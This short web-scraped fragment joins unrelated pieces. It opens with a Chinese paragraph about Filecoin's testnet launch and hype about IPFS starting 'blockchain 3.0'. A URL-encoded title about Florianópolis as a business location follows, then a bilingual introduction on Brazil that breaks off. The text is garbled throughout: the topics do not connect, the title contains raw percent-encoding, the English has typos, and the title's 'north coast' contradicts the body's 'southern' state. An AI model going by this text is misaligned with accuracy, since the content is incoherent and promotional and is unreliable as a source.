8月25日Filecoin的大礦工測試網開啟之後,距離分散式儲存龍頭專案Filecoin上線主網的時間也越來越近,整個圈子開始熱鬧起來。許多業內人士認為IPFS將開啟區塊鏈3.0時代,未來三年,分散式儲存將會大放異彩,

Florian%C3%B3polis巴西北岸業務的最佳場所四方資料分析

Introduction 介紹 The Background 的背景 Brazil is known for Rio de Janeiro or São Paulo. But one of the most southern states os Brazil has a peculiar capital on an island. Or most